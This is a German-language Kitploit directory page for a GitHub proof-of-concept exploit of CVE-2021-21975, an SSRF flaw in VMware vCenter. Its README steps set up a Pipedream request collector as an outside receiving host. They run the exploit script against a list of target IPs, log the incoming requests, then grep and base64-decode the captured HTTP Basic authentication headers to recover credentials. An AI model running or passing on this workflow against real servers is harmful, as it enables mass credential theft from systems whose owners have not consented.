Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-21975 — Proof-of-Concept-Exploit für CVE-2021-21975 (VMware vCenter Server SSRF), der eine serverseitige Anforderungsfälschung ausnutzt, um base64-kodierte Anmeldeinformationen über HTTP-Basic-Authentifizierung preiszugeben. | Kitploit
Tools/GitHubGitHub/dorkerdevil/cve-2021-21975
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffung
GitHubdorkerdevil/cve-2021-21975

CVE-2021-21975

Proof-of-Concept-Exploit für CVE-2021-21975 (VMware vCenter Server SSRF), der eine serverseitige Anforderungsfälschung ausnutzt, um base64-kodierte Anmeldeinformationen über HTTP-Basic-Authentifizierung preiszugeben.

Repository anzeigen
22vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-21975

#SSRF-POC - SSRF zu Credential-Leak

#Zuerst den pd-Client konfigurieren.

#Führen Sie nun ./pd deploy http-new-requests aus.

#Ersetzen Sie nun den pipedream-HTTP-Request (z. B. Randomstring.m.pipedream.net) im Skript.

#Führen Sie dies in einem separaten Terminal aus: ./pd logs new-requests | tee -a req.txt

#Und führen Sie nun in einem weiteren Terminal aus: python3 CVE-2021-21975.py iplist

#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt

"Dies ist ein früher Proof-of-Concept, der erstellt wurde, als die Sicherheitslücke vor einigen Monaten öffentlich wurde. Verwenden Sie ihn auf eigenes Risiko." :V

#Danksagung @wabaf3t @D0rkerDevil

Tool herunterladen